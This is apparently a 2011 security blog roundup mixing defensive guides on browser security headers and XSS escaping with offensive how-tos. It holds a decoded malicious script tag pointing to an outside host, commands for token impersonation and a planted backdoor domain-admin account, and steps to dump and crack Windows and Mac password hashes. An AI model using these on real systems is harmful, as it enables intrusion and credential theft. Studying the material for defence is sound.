Apr 2, 2011

Javascript Obfuscation Using Colors?

This article is very interesting to me and I think whoever invented this is very smart. I cut out some paragraphs of this article. If you want to see the full article, please go to the Source.

If this was found on a webpage, you might just overlook it as something benign.
It starts off by defining an array of hexadecimal values which look like a representation of different colors.

new Array('#4b8272','#81787f','#832f83','#887f74','#4c3183','#748783','#3e7970',

The function "div_pick_colors" concatenates them into one long string after ignoring the pound sign. You end up with this:


The same function then grabs two characters at a time and does some fancy footwork to convert it into a malicious redirect.

s += String.fromCharCode(parseInt(c_clr, 16) - 15);

Let's go through this quickly...
Get the first two characters from the string above (which is "4b").
Convert it from hexadecimal to decimal (you'll get "75").
Subtract 15 from the decimal value (which is "60").
Now convert the decimal value to ASCII (you'll end up with "<").
Now do the next one...
Get the second two characters (which is "82").
Convert it from hex to decimal (you'll get "130").
Subtract 15 from the decimal value (which is "115").
Now convert the value to ASCII (you'll end up with "s").
If you continue along, you'll end up with the following redirect code:

<script type="text/javascript" src="http://kusto11.com/js/jquery.min.php">

If you want to cheat, you can insert an alert into the script which will pop up the redirect code in one fell swoop.
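As an added example (my own code, not from the Kahu Security article), here is the same decoding done in Python over the seven color values quoted above, plus a helper for when a sample uses a constant other than 15:

```python
"""Decoder for the "color array" trick described above.
Added example, not code from the Kahu Security article; the function names are mine."""

# The seven entries quoted from the article (the rest of the array is not on the page).
COLORS = ['#4b8272', '#81787f', '#832f83', '#887f74', '#4c3183', '#748783', '#3e7970']


def decode_color_array(colors, offset=15):
    """Join the hex digits (dropping '#'), take them two at a time, hex->int, subtract the
    offset and map to a character: the same steps the walkthrough does by hand."""
    digits = "".join(c.lstrip("#") for c in colors)
    if len(digits) % 2:
        raise ValueError("odd number of hex digits")
    return "".join(chr(int(digits[i:i + 2], 16) - offset) for i in range(0, len(digits), 2))


def candidate_offsets(colors, max_offset=64):
    """When a new sample uses a different constant, list every offset under which all
    decoded bytes are printable ASCII (the hidden script has to be valid text to run)."""
    digits = "".join(c.lstrip("#") for c in colors)
    values = [int(digits[i:i + 2], 16) for i in range(0, len(digits), 2)]
    return [off for off in range(max_offset + 1) if all(32 <= v - off <= 126 for v in values)]


def best_offset(colors):
    """Among the candidates, prefer the one that yields markup (a '<' somewhere); None if none does."""
    for off in candidate_offsets(colors):
        if "<" in decode_color_array(colors, off):
            return off
    return None


if __name__ == "__main__":
    print(decode_color_array(COLORS))   # the start of the injected <script> tag
    print(candidate_offsets(COLORS), best_offset(COLORS))
```

The seven values on the page decode to the first 21 characters of the redirect tag; the offset search is what you reach for when the next sample subtracts a different constant.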

Source: http://www.kahusecurity.com/2011/javascript-obfuscation-using-colors

yInjector – SQL Injection Penetration Tool

yInjector is a MySQL Injection penetration tool.
SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. (Wikipedia)

Main Feature
  • GET and POST request
  • Proxy Support
  • Log Report option available
Exploitation Methods
  • Columns number finder
  • Database dump, SQL Injection must be provided
  • Advanced and Automated Exploitation : finds the SQL Injection to provide a Shell Assistant
Shell Assistant features
  • Multiple data from all DB extraction
  • MySQL Command line (SELECT)
  • md5 hash cracker assistant
  • Remote Command Execution via SQL Injection
Video:  yInjector – SQL Injection Penetration Tool
More Information: http://y-osirys.com/softwares/

Source: http://www.vulnerabilitydatabase.com/2011/03/yinjector-sql-injection-penetration-tool/

Howto: Installation "MITMPROXY"

mitmproxy is an SSL-capable, intercepting HTTP proxy. It provides a console interface that allows traffic flows to be inspected and edited on the fly. (if you want to download it, please see the Source.)

Now I want to install and use it in my Backtrack4. This is the installation.
1. Download ssl module for Python and install it.
- wget http://pypi.python.org/packages/source/s/ssl/ssl-1.15.tar.gz
- tar xzvf ssl-1.15.tar.gz
- cd ssl-1.15
- make
- make install
2. Go to the ssl library path of Python 2.5 (my installed Python version) and delete the __init__.pyc file
- cd /usr/lib/python2.5/site-packages/ssl
- rm __init__.pyc
3. Download and install urwid
- wget http://excess.org/urwid/urwid-
- tar xzvf urwid-
- cd urwid-
- python setup.py install
4. Download and install pry
- wget https://github.com/samtaufa/pry/zipball/master
- tar xzvf cortesi-pry-3f27057.tar.gz
- cd cortesi-pry-3f27057
- python setup.py install
5. Now we're ready to install and use mitmproxy
- cd mitmproxy
- python setup.py install
- mitmproxy
6. Set the browser to use this proxy, or use ARP spoofing to redirect traffic to this tool (I will create a video soon.)

If you want some example or want to download mitmproxy, please go to the Source.
Source: http://mitmproxy.org/

Apr 1, 2011

Enabling Browser Security in Web Applications

HTTPOnly, Secure Flag, Strict Transport Security, X-Frame-Options, Content Security Policy
The vast majority of application security occurs within the application’s code. However, there are a few key security controls that are enabled by the web application dictating security properties to the web browser.

Some of these defensive controls have been around for a while and others are newly supported in Firefox 4 and other modern browsers. Mozilla has been rolling out these controls across all of our websites with a high degree of success.

HTTPOnly
Benefit: Minimizes the impact of a cross site scripting vulnerability by preventing JavaScript access to the session cookie.
Limitations: Does not protect against any other malicious actions from XSS (phishing, malicious redirects, etc.)
Example within HTTP Response:
Set-Cookie: sessiondID=kljahsdf123; HTTPOnly;

Secure Flag
Benefit: Instructs the browser to never send the cookie over an HTTP request. The cookie can only be sent over HTTPS. This works even if the user manually types in a request for HTTP. The HTTP request will be sent, but the browser will not send any cookies marked as "SECURE".
Limitations: The HTTP request is still sent and this could be manipulated by a man in the middle to perform convincing phishing attacks (see Strict Transport Security for the solution).
Example within HTTP Response:
Set-Cookie: sessiondID=kljahsdf123; SECURE;
Note: When setting both the HTTPOnly and SECURE flags you will simply have both values for the cookie:
Set-Cookie: sessiondID=kljahsdf123; HTTPOnly; SECURE;

Strict Transport Security
Benefit: Instructs the browser to never send requests to the domain over HTTP. Requests can only be sent over HTTPS.  Think of this as the Secure flag for the entire request. This will protect the user even if they manually type in HTTP into the URL. The browser will upgrade this to HTTPS, assuming the site has previously enabled HSTS, and only the HTTPS request will be sent over the network.
Limitations: Only supported in the most recent browser versions; however, support is growing quickly. Even if CSP is only supported by a portion of users it can act as an alerting system via the report-uri to detect and report CSP violations that could be an attack.
Example within HTTP Response:
Strict-Transport-Security: max-age=60000

X-Frame-Options
Benefit: Instructs the browser to disallow framing of a domain, or to limit framing to sites of the same domain. This prevents clickjacking attacks and other malicious framing actions.
Limitations: Not supported in very old browser versions.
Example within HTTP Response:
X-Frame-Options: DENY
X-Frame-Options: SAMEORIGIN

Content Security Policy (CSP)
Benefit: CSP provides some amazing benefits. After a website is set up appropriately (no use of inline JavaScript) and a policy has been established, CSP will effectively prevent XSS where attacker controlled data is embedded in the HTML document. This works since the policy has established what JavaScript code is allowed, and any other JavaScript that may make its way into the webpage via user input is flagged by the browser and blocked.
Limitations: Supported in Firefox 4, with plans for support in Chrome. It is still possible to introduce XSS vulnerabilities by not properly validating and sanitizing JSON content, or by including attacker controlled data in dynamically generated JavaScript code.
Example within HTTP Response:
X-Content-Security-Policy: allow 'self' *.mydomain.com
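Added example (not code from the Mozilla post): a small Python helper that builds these headers and audits a response for the ones that are missing. The function names and the sample responses are my own.

```python
"""Build and audit the response headers this post describes.
Added example, not the Mozilla post's code; function names and the sample responses are mine."""


def secure_cookie(name, value):
    """Set-Cookie value carrying both flags: no script access (HttpOnly) and HTTPS only (Secure)."""
    return f"{name}={value}; HttpOnly; Secure"


def security_headers(max_age=60000, frame="DENY", csp_sources=("'self'",)):
    """The three header-level controls. X-Content-Security-Policy with 'allow' is the
    Firefox 4 prefixed syntax the post shows, not the later standard Content-Security-Policy."""
    return {
        "Strict-Transport-Security": f"max-age={max_age}",
        "X-Frame-Options": frame,
        "X-Content-Security-Policy": "allow " + " ".join(csp_sources),
    }


def audit_response(headers):
    """Return the missing controls for a dict of response headers.
    Header names are matched case-insensitively; Set-Cookie may be one string or a list."""
    h = {k.lower(): v for k, v in headers.items()}
    findings = []
    cookies = h.get("set-cookie", [])
    if isinstance(cookies, str):
        cookies = [cookies]
    for cookie in cookies:
        name = cookie.split("=", 1)[0].strip()
        attrs = {a.strip().split("=", 1)[0].lower() for a in cookie.split(";")[1:]}
        if "httponly" not in attrs:
            findings.append(f"cookie {name}: missing HttpOnly")
        if "secure" not in attrs:
            findings.append(f"cookie {name}: missing Secure")
    if "strict-transport-security" not in h:
        findings.append("missing Strict-Transport-Security")
    if h.get("x-frame-options", "").upper() not in ("DENY", "SAMEORIGIN"):
        findings.append("X-Frame-Options missing or not DENY/SAMEORIGIN")
    if "x-content-security-policy" not in h and "content-security-policy" not in h:
        findings.append("missing Content Security Policy")
    return findings


# Constructed sample responses: one with nothing set, one built with the helpers above.
WEAK_RESPONSE = {"Content-Type": "text/html", "Set-Cookie": "sessionid=kljahsdf123; Path=/"}
HARDENED_RESPONSE = {"Content-Type": "text/html",
                     "Set-Cookie": secure_cookie("sessionid", "kljahsdf123"),
                     **security_headers(csp_sources=("'self'", "*.mydomain.com"))}

if __name__ == "__main__":
    for label, resp in (("weak", WEAK_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        print(label, audit_response(resp) or "no findings")
```

The audit is deliberately strict about X-Frame-Options: anything other than DENY or SAMEORIGIN is reported, since a typo in that header silently leaves the page frameable.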

Source: http://blog.mozilla.com/webappsec/2011/03/31/enabling-browser-security-in-web-applications/

Mar 30, 2011

Spamming From Gmail Or Not

Now, I received mail from "gteamgroup.activation@gmail.com" that was put into my "Inbox", not "Spam".

First he sent an email to me:
from: GMAIL ACTIVE [#783253745] <gteamgroup.activation@gmail.com>
date: Wed, Mar 30, 2011 at 10:34 AM
subject: Google Customer Care

If your Gmail account is still active,reply by saying you are active ..
and the second email is:
from: gteamgroup.activation <gteamgroup.activation@gmail.com>
date: Wed, Mar 30, 2011 at 10:37 AM
subject: Google Customer Care Re: Google Customer Care

At Google, we take your privacy and security seriously. Presently we
are having congestion due to the anonymous registration of too many
Gmail accounts so we are shutting down some accounts and your account
was among those to be deleted. We are sending this email to you so
that you can confirm the ownership and let us know if you still want
to continue using this account.

Gmail need you to verify your account details ASAP .

Do you use Gmail with this account ?* Yes No
Do you use orkut with this Google Account ?* Yes No
Do you use Blogger with this Google Account ?* Yes No

Most Importantly The Details below is needed :

* Full Name * :

* Email ID * :

* Password * :

* Year Registered * :

* Country * :

Account Owners who refuse to Participate in the Verification process
after receiving this message will lose his/her Account within 48hours

We apologize for any inconvenience and appreciate your cooperation and
understanding looking forward to hearing from you..

The Google Account Verification Team
I think this is a spam email or hoax email; don't send your information to them.
If someone knows the email address of the Gmail support team, please tell me and I will send this problem to them.

Mar 29, 2011

Howto: Attack the local Windows domain

I read an interesting article about how to attack a Windows domain, and I will try to explain it in my own style. This is what I got from that article.

All the results of each step can be seen in the Source.

1. Get the usernames in the local administrators group
    - net localgroup administrators
2. Enumerate the domain admins
    - net group "domain admins" /domain
3. Incognito is a tool for manipulating Windows access tokens, and now we use it to see the Windows tokens on our target.
    - incognito -h -u local_valsmith -p D0nth3ckm3 list_tokens -u
  • -h is the target host, and in that article it is our target.
  • -u is the username for the remote host
  • -p is the password for the remote host
  • -u (last) is used to list the tokens of users
(*** If you don't have incognito, you can download it from http://sourceforge.net/projects/incognito/files/incognito/incognito%20v0.1/incognito-v0.1.zip/download )

 4. From step 3 we know that the "blackhatadmin_valsmith" token can be impersonated, and now we try to do it to get domain admin group rights
    - incognito -h -u local_valsmith -p D0nth3ckm3 execute -c "blackhatadmin_valsmith" cmd

 5. Create a new user to keep the hole open, and add the new user into "domain admins".
    - net user hacked 0h3ck3d! /add /domain
    - net group "domain admins" hacked /add /domain

Now we got it.

Source:  http://www.coresec.org/2011/03/27/how-to-attack-a-windows-domain/

Verifying the Comodo Hacker's key ("short explanation")

After I read the blog post from Errata Security, I wanted to summarize how to verify the Comodo Hacker's key with a short explanation.

1. Download the public key of Mozilla.
   $wget -O addons.mozilla.org.cer https://bugzilla.mozilla.org/attachment.cgi?id=519863

2. Copy the private key from "Comodo Hacker: Mozilla Cert Released", which begins with "-----BEGIN RSA PRIVATE KEY-----" and ends with "-----END RSA PRIVATE KEY-----", into private.pem
   $cat "$KEY" > private.pem

3. Extract the public key from the SSL-website of Mozilla.
   $openssl x509 -noout -inform DER -in addons.mozilla.org.cer -pubkey > public.pem

4. Create a simple file and encrypt it with the public key
   $echo "testing file" > testing.txt
   $openssl rsautl -encrypt -inkey public.pem -pubin -in testing.txt -out testencrypted

5. Try to decrypt it with private key.
   $openssl rsautl -decrypt -inkey private.pem -in testencrypted -out decrypted.txt

6. Check whether decrypted.txt matches testing.txt; that will tell you whether private.pem is real or not.
   $cat decrypted.txt
   $diff testing.txt decrypted.txt
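Added example, not from the Errata Security post: a Python wrapper around the same openssl tool that answers the question of steps 4-6 directly, by comparing the RSA modulus of the private key with the modulus in the certificate (a key pair shares one modulus). The demo() self-check uses a throwaway self-signed certificate it generates itself, not Mozilla's, and the function names are mine.

```python
"""Check whether a leaked RSA private key belongs to a certificate, which is what steps 1-6
establish by an encrypt/decrypt round trip. Added example, not Errata Security's code; it
shells out to the same openssl tool and compares the RSA modulus of both objects instead."""
import os
import subprocess
import tempfile


def _modulus(openssl_args):
    """Run an openssl subcommand that prints 'Modulus=<hex>' and return the hex string (or None)."""
    proc = subprocess.run(["openssl"] + openssl_args, capture_output=True, text=True)
    if proc.returncode != 0 or not proc.stdout.startswith("Modulus="):
        return None
    return proc.stdout.strip()[len("Modulus="):].upper()


def key_matches_cert(key_path, cert_path, cert_inform="PEM"):
    """True if the private key and the certificate's public key share a modulus, i.e. are one key pair.
    Use cert_inform="DER" for a .cer file like the one the article fetches from Bugzilla."""
    key_mod = _modulus(["rsa", "-noout", "-modulus", "-in", key_path])
    cert_mod = _modulus(["x509", "-noout", "-modulus", "-inform", cert_inform, "-in", cert_path])
    if key_mod is None or cert_mod is None:
        raise RuntimeError("could not read an RSA modulus from the key or the certificate")
    return key_mod == cert_mod


def demo():
    """Self-check on constructed material: a throwaway self-signed certificate with its real key,
    and a second, unrelated key. Returns (real key matches, unrelated key matches)."""
    with tempfile.TemporaryDirectory() as d:
        key, cert, other = (os.path.join(d, n) for n in ("real.pem", "cert.pem", "other.pem"))
        subprocess.run(["openssl", "req", "-x509", "-newkey", "rsa:2048", "-nodes", "-keyout", key,
                        "-out", cert, "-subj", "/CN=example.test", "-days", "1"],
                       check=True, capture_output=True)
        subprocess.run(["openssl", "genrsa", "-out", other, "2048"], check=True, capture_output=True)
        return key_matches_cert(key, cert), key_matches_cert(other, cert)


if __name__ == "__main__":
    print(demo())  # (True, False)
```

For the real check, call key_matches_cert("private.pem", "addons.mozilla.org.cer", cert_inform="DER") with the two files from steps 1 and 2; a True result is the same evidence the diff in step 6 gives you.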
If you want to see the details or the meaning of each step, please see the Source.
Source: http://erratasec.blogspot.com/2011/03/verifying-comodo-hackers-key.html

Howto: Solve the OpenVPN problem with Windows 7

Every day, I use OpenVPN to connect to the company network. After I upgraded my Windows XP (I have 2 OSes, Backtrack4 and Windows XP) to Windows 7, my OpenVPN got a problem like this.

ROUTE: route addition failed using CreateIpForwardEntry: One or more arguments are not correct.
Route addition via IPAPI failed

Now, I found how to solve this problem:
1. Install the OpenVPN development version to replace the stable version. (http://swupdate.openvpn.net/community/releases/openvpn-2.2-RC2-install.exe)
2. Run it as Administrator, and I recommend changing the permissions of openvpn-gui-1.0.3.exe ("C:\Program Files\OpenVPN\bin\openvpn-gui-1.0.3.exe") so it runs as Administrator every time.

Source: http://skriptd.wordpress.com/2007/07/12/openvpn-gui-on-windows-vista/

Message from Comodo Hacker.

Now, the game's changed. This post will give you the messages from the Comodo Hacker that made the big news about the forged certificate exploit last week (http://www.comodo.com/Comodo-Fraud-Incident-2011-03-23.html).

All of the messages tell you how the Comodo hacker forged the certificates after hacking Comodo through InstantSSL.it, and that he is a single hacker, not a group of hackers. You can find other details of the big news in the messages.

**Update the messages.

1.A message from Comodo Hacker
2.Another proof of Hack from Comodo Hacker
3.Just Another proof from Comodo Hacker
4.Comodo Hacker: Mozilla Cert Released

Mar 28, 2011

Big Name Companies (SUN.com and MySQL.com) were hacked with Blind SQL Injection

Last night (26/03/2011) in Thailand, I found the news on my Twitter (sorry, I can't remember who tweeted this news to me) that MySQL.com and Sun.com were hacked with Blind SQL Injection. If you want to see the details, see the Source.


Sun.com (Oracle Sun Microsystems) vulnerable to SQL Injection

MySQL.com (also MySQL France,Italy,Japan,Germany,etc) Full Disclosure (Hacked)

Mar 27, 2011

Howto: Enable WebGL on Firefox 4

WebGL is a Web-based Graphics Library. It extends the capability of the JavaScript programming language to allow it to generate interactive 3D graphics within any compatible web browser.
WebGL is a context of the canvas HTML element that provides a 3D computer graphics API without the use of plug-ins.

1. Install the new library to replace the old one.
    - apt-get install libosmesa6
2. Run Firefox 4 and go to the about:config page
3. Search for webgl.osmesalib
4. Set the string to "/usr/lib/libOSMesa.so.6"
5. Restart Firefox 4

Source: http://www.ubuntugeek.com/howto-enable-webgl-on-firefox-4.html

Preventing XSS Attacks

Cross Site Scripting (XSS) attacks are amongst the most common types of attacks against web applications. XSS attacks all fall under the same category; however, a more detailed look at the techniques employed during XSS operations reveals a multitude of tactics that exploit a variety of attack vectors. A detailed look at XSS attacks can be found in the following article: Cross-Site Scripting attack. This article guides you through the most common and useful XSS prevention mechanisms, which are Filtering and Escaping.

Filtering for XSS

All XSS attacks infect your web site via some form of User Input. XSS attack code could come from a simple <FORM> submitted by your users, or could take a more complex route such as a JSON script, XML web service or even an exploited cookie. In all cases the web developer should be aware that the data is coming from an external source and therefore must not be trusted.
The simplest and arguably the easiest form of XSS protection would be to pass all external data through a filter which will remove dangerous keywords, such as the infamous <SCRIPT> tag, JavaScript commands, CSS styles and other dangerous HTML markup (such as those that contain event handlers.)

Escaping from XSS

This is the primary means to disable an XSS attack.
Escaping has been used to construct this article. I have managed to bring many scripts into your browser, but none of these scripts has executed! The technique used to do that is called escaping, or as the W3C calls it, "Character Escaping".
In HTML you can escape dangerous characters by using the &# sequence followed by the character's code.
An escaped < character looks like this: &#60. The > character is escaped like this: &#62. Below is a list of common escape codes for HTML:

" ---> &#34
# ---> &#35
& ---> &#38
' ---> &#39
( ---> &#40
) ---> &#41
/ ---> &#47
; ---> &#59
< ---> &#60
> ---> &#62

Escaping HTML is fairly easy; however, in order to properly protect yourself from all XSS attacks you need to escape JavaScript, Cascading Style Sheets, and sometimes XML data.
The two most popular escaping libraries available are ESAPI, provided by OWASP, and AntiXSS, provided by Microsoft. ESAPI can plug into various technologies such as Java, .NET, PHP, Classic ASP, Cold Fusion, Python, and Haskell. AntiXSS exclusively protects Microsoft technologies and is therefore better suited to an all-Microsoft environment. Both libraries are constantly updated to keep up with the latest hacker techniques and are maintained by industry experts who understand changing tactics and emerging technologies such as HTML5.

When to Escape

Use HTML Escaping when... untrusted data is inserted in between HTML opening and closing tags. These are standard tags such as <BODY>, <DIV>, <TABLE> etc.
Use JavaScript Escaping when... untrusted data is inserted inside one of your scripts, or in a place where JavaScript can be present. This includes certain attributes such as STYLE and all event handlers such as ONMOUSEOVER and ONLOAD.
Use CSS Escaping when... untrusted data is inserted inside your CSS styles. As you saw in the Attack Vectors examples, many CSS styles can be used to smuggle a script into your page.
The source article includes a diagram of the internet boundary showing where filtering and escaping must happen to ensure XSS protection.
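Added example (my own code, not Acunetix's or any library's): one escaper per context from the list above, and a constructed page fragment that shows the same untrusted input handled in all three places.

```python
"""Context-specific escapers for the three cases above: HTML body, JavaScript string, CSS value.
Added example, not Acunetix's or ESAPI's code; the helper names and the sample page are mine."""

# The &#NN; form from the escape table above (the semicolon terminates the reference).
HTML_ESCAPES = {"&": "&#38;", "<": "&#60;", ">": "&#62;", '"': "&#34;", "'": "&#39;", "/": "&#47;"}


def escape_html(s):
    """For untrusted data between HTML tags: the browser renders the reference as text, never as markup."""
    return "".join(HTML_ESCAPES.get(ch, ch) for ch in s)


def escape_js(s):
    """For untrusted data inside a JavaScript string literal: every non-alphanumeric character
    becomes \\xHH (or \\uHHHH, as UTF-16 units, outside Latin-1), so quotes, '<' and '/' cannot
    end the string or the enclosing <script> element."""
    out = []
    for ch in s:
        if ch.isascii() and ch.isalnum():
            out.append(ch)
        elif ord(ch) < 256:
            out.append("\\x%02x" % ord(ch))
        else:
            units = ch.encode("utf-16-be")
            out.extend("\\u%04x" % int.from_bytes(units[i:i + 2], "big") for i in range(0, len(units), 2))
    return "".join(out)


def escape_css(s):
    """For untrusted data inside a CSS value: \\HH followed by a space, so a following hex digit
    is not absorbed into the escape."""
    return "".join(ch if (ch.isascii() and ch.isalnum()) else "\\%x " % ord(ch) for ch in s)


def render_profile(display_name, theme_color):
    """Constructed page fragment that places the same untrusted values in all three contexts."""
    return (
        f'<div class="name">{escape_html(display_name)}</div>\n'
        f"<script>var name = '{escape_js(display_name)}';</script>\n"
        f"<style>.name {{ color: {escape_css(theme_color)}; }}</style>"
    )


if __name__ == "__main__":
    print(render_profile("<script>alert(1)</script>", "red;}</style><script>alert(2)</script>"))
```

Notice that each escaper only knows its own context: escape_html output dropped into a script block would still let a quote end the string, which is why the section above asks which context the data lands in before choosing the escaper.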

XSS Attacks are a moving target

In this article I attempted to collect as many as possible of the recommendations and best practices used by security researchers worldwide. The recommendations set out in this article are by no means exhaustive; however, they should be a good starting point for your XSS defence endeavours.
Technology is changing, and hacker attacks are getting more sophisticated but by understanding the basics set out in this article you can be prepared to prevent future attack techniques that will most definitely arise.
The first step in defending against XSS attacks is to code your web applications carefully and use the proper escaping mechanisms in the right places. After that comprehensive testing should be performed, ideally using an automated XSS scanner. When updates are made to your web applications, you should scan the affected pages again to ensure that no new vulnerabilities have been exposed.

If you want to see the full article, please see the Source.
Source: http://www.acunetix.com/blog/web-security-zone/articles/preventing-xss-attacks/

Cracking Windows XP Passwords

This page is about cracking (recovering) passwords on Windows XP machines, which is a computationally difficult process. If you just need to set a new password (but without need to recover the old one), then this guide is not for you.


The Windows XP passwords are hashed using LM hash and/or NTLM hash. The hashes are stored in c:\windows\system32\config\SAM. The SAM file is encrypted using c:\windows\system32\config\system and is locked when Windows is running. To get the passwords, you need to shut down Windows, decrypt the SAM file, and then crack the hashes. You can also obtain the hashes using other software that does not require you to turn your computer off. If everything goes well, you'll have the passwords in 15 minutes.
The SKCLONE tool will allow extracting password hashes in PWDUMP format from the live SAM and importing them to other live systems including 64 bit systems, making it a useful tool for migrating local user accounts to 64 bit windows. It does however require you to run the software as the SYSTEM account, since it will try to reach HKLM\SECURITY\SAM in the registry.


  1. You can use the pwdump (or copypwd or skclone) tool to extract the password hashes, and then use ophcrack or other rainbow table sites to crack the passwords. If you do not want to use an online service you can download the ophcrack live CD from http://ophcrack.sourceforge.net/, let the machine boot from the CD, press return, lie back and watch the program crack the hashes.
  2. One solution is to use the Windows Password Recovery Tool to crack the Windows XP password.
  3. A more convenient way is a Windows password reset with a USB flash drive.
  4. How to recover Windows password?
  5. Reset local administrator and user passwords on Windows 7 / Vista / XP / 2008 / 2003 / 2000, if you forgot Windows password and can't log into the computer.

Three ways to recover Windows Password

Usually, we can recover a Windows admin password in two traditional ways. The first is to change the password with another admin account; the second is to recover the previous password with the Windows password reset disk that was created before you forgot the password. Take Windows XP for example:
  • At the Windows XP login prompt, when the password is entered incorrectly, click the reset button in the login failed window.
  • Insert the password reset diskette into the computer and click Next.
  • If the diskette is correct, Windows XP will open a window prompting for the new password you wish to use.
However, we often ignore the importance of security until we have been locked out of the computer. Fortunately, there is still a last way that can unlock your computer without reinstalling: erase the Windows password with a Windows password reset CD, which can recover the admin password for Windows 7/XP/Vista/NT/2000/2003.... Take Windows Password Unlocker for example; the following are the steps to create the reset CD.

The steps are in the Source, at the end of this post.

Ophcrack demo

The easiest site to use is the online demo for the Ophcrack software tool.
  • Use PWDump or other password extraction tool to extract the passwords from the target computer. (Note: In order to work, it must be run under an Administrator account )
  • Retain only the part with the two hashes and the colon in between:
If your password is not alphanumeric (indicated by 7 dots in part of the password, or if it says "Not found"), then you will have to use one of the following more powerful sites that contain rainbow tables for symbols as well:


  • Use PWDump or other password extraction tool to extract the passwords from the target computer. (Note: In order to work, it must be run under an Administrator account )
  • Edit the password hash to the pwdump format (add the colon-delimited username and ID number fields in the front, and 3 colons at the end):
  • Go to http://plain-text.info/, click "Add Hashes", enter the hashes in the box, select "lm" as the algorithm, complete the CAPTCHA, and click submit
  • They only crack 2 hashes every 15 minutes, so you may have to wait
  • After a few minutes/hours, come back, go to "Search", type in your hash (just the LM part), and see if it is cracked
  • Read their FAQ for more info.


  • Use PWDump or other password extraction tool to extract the passwords from the target computer.
  • Go to http://www.astalavista.com/index.php?app=onlinetools&module=rainbowtables, click the "crack my hash" tab, select type "lm" in the drop-down menu, and enter the LM hash (part before the colon) into the query field, select "LM" for the algorithm, and click the "Search" button.
  • Check the status page occasionally to see if they have been cracked.
  • The result is case-insensitive, so you have to try inputting all variations of upper and lower case to the "NT Calculator". The correct password is the one that matches the NTLM hash (part after the colon).


  • Use PWDump or other password extraction tool to extract the passwords from the target computer.
  • Go to http://www.OnlineHashCrack.com and enter the LM or NTLM hash (part before the colon) into the query field and click the "Search" button.
  • Check the status page occasionally to see if they have been cracked.
  • If the hash is not in their database, the rainbow tables will be used to find it.


  • If the information retrieved from the pwdump consists of an empty first part, then the LM hash is not stored. This either means that the password is blank, in which case it would look like this:
If it says anything different, then they implemented better security and force you to crack the NTLM hash, which is much more difficult and out of the scope of this guide.
  • This only works if the password is 14 characters or shorter
  • If the password in Windows 2000/XP/2003 is longer than 14 characters, it will be shortened to two hashes of length seven characters each
  • An alternative, which uses the same method of comparing known hashes against unknown is called RainbowCrack, available at http://www.antsight.com/zsl/rainbowcrack/ although this program uses Rainbow Tables that can be in excess of 64 Gb; these tables can be obtained at http://rainbowtables.shmoo.com/
  • A comprehensive project of comparing known hashes against an unknown is at http://www.rainbowcrack.com/ however it requires that you submit a Rainbow Table before you can gain access to their server

Defense against attack

Mac OS X 10.3

Mac OS X 10.3 (Panther) also stores shadowed LM+NTLM hashes for each user. They can be cracked in the same way as the hashes for Windows above.
  • First find the "generateduid" for the user you want with the command
$ niutil -readprop . /users/<username> generateduid
  • The hashes are stored in the file /var/db/shadow/hash/<generateduid>. The file is 104 characters long, consisting of the 64-character NTLM+LM hashes and the 40-character SHA1 hash. To retrieve the NTLM+LM hashes, you can run this command as an administrator for example
$ sudo cut -c1-64 /var/db/shadow/hash/70902C33-AC79-11DA-AFDF-000A95CD9AF8
  • The hashes are stored in the reverse order from the pwdump format (NTLM first instead of LM first), so you need to swap the 32-character halves and insert a colon between them
  • Then follow the instructions for Windows passwords
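Added example, not from the Wikibooks page: a Python parser for the pwdump format used above, an audit of what the LM field reveals before any cracking, and the half-swapping conversion for the Mac OS X 10.3 shadow file. The sample hashes are constructed, except the two well-known empty-password constants, and the function names are mine.

```python
"""Parse and audit pwdump-format lines, and convert a Mac OS X 10.3 shadow hash into that format.
Added example for the pwdump layout and the NTLM/LM ordering notes above; not the Wikibooks
page's code, and the sample hashes are constructed, not real accounts."""
import re

HEX32 = re.compile(r"^[0-9a-fA-F]{32}$")
LM_EMPTY = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of an empty (or not stored) password
NT_EMPTY = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of an empty password


def parse_pwdump_line(line):
    """'user:rid:LM:NT:::' -> dict. Raises ValueError on anything else (e.g. an ophcrack display line)."""
    parts = line.strip().split(":")
    if len(parts) < 4:
        raise ValueError("not a pwdump line: %r" % line)
    user, rid, lm, nt = parts[0], parts[1], parts[2].lower(), parts[3].lower()
    if not rid.isdigit() or not HEX32.match(lm) or not HEX32.match(nt):
        raise ValueError("bad rid or hash field: %r" % line)
    return {"user": user, "rid": int(rid), "lm": lm, "nt": nt}


def classify(entry):
    """What the LM field tells a defender before anyone cracks anything."""
    if entry["lm"] == LM_EMPTY and entry["nt"] == NT_EMPTY:
        return "blank password"
    if entry["lm"] == LM_EMPTY:
        return "lm not stored"            # NoLMHash policy, or password longer than 14 characters
    if entry["lm"][16:] == LM_EMPTY[16:]:
        return "lm stored, password <= 7 chars"  # second 7-character half is empty
    return "lm stored"


def audit(lines):
    """Map each account to its verdict; accounts still storing LM hashes are the ones to fix first."""
    return {e["user"]: classify(e) for e in (parse_pwdump_line(l) for l in lines if l.strip())}


def mac_shadow_to_pwdump(user, rid, shadow_hex):
    """/var/db/shadow/hash/<generateduid> holds NTLM then LM in its first 64 characters;
    pwdump wants LM first, so swap the 32-character halves and add the colon fields."""
    first64 = shadow_hex.strip()[:64]
    if len(first64) != 64 or not HEX32.match(first64[:32]) or not HEX32.match(first64[32:]):
        raise ValueError("expected at least 64 hex characters")
    nt, lm = first64[:32].lower(), first64[32:].lower()
    return "%s:%d:%s:%s:::" % (user, rid, lm, nt)


# Constructed sample lines (hash values are made up except the two well-known empty-password constants).
SAMPLE_PWDUMP = [
    "Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::",
    "alice:1001:0123456789abcdefaad3b435b51404ee:fedcba9876543210fedcba9876543210:::",
    "bob:1002:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::",
    "carol:1003:0123456789abcdef0123456789abcdef:fedcba9876543210fedcba9876543210:::",
]
# 104 characters like the Panther file: 32 NTLM + 32 LM + 40 SHA1 (all constructed).
SAMPLE_MAC_SHADOW = "fedcba9876543210fedcba9876543210" + "0123456789abcdefaad3b435b51404ee" + "a" * 40

if __name__ == "__main__":
    for account, verdict in audit(SAMPLE_PWDUMP).items():
        print(account, "->", verdict)
    print(mac_shadow_to_pwdump("dave", 1004, SAMPLE_MAC_SHADOW))
```

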